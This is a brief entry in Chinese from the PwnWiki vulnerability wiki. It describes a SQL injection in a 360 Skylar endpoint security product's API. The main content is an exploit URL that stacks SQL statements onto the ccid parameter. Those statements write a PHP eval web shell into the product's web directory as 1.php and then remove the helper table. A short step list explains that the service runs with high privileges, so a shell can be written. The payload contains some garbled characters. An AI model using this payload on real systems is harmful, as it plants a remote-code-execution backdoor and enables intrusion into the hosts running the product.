免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
EXP
https://127.0.0.1:8843/api/dp/rptsvcsyncpoint?ccid=1';create table O(TEXT);insert into O(T) values('<>php @eval($_POST1;?>)');copy O(T) to 'C"\Program Files(x86)\360\skylar6\www\1.php';drop table O;--
漏洞信息
1.通过安装包安装的程序一般拥有ROOT权限,因此该注入点可尝试写入Shell
2.通过注入点,创建一张表 O
3.为表O
添加一个新字段T
并且写入Shell内容
免费、自由、人人可编辑的漏洞库--PwnWiki.com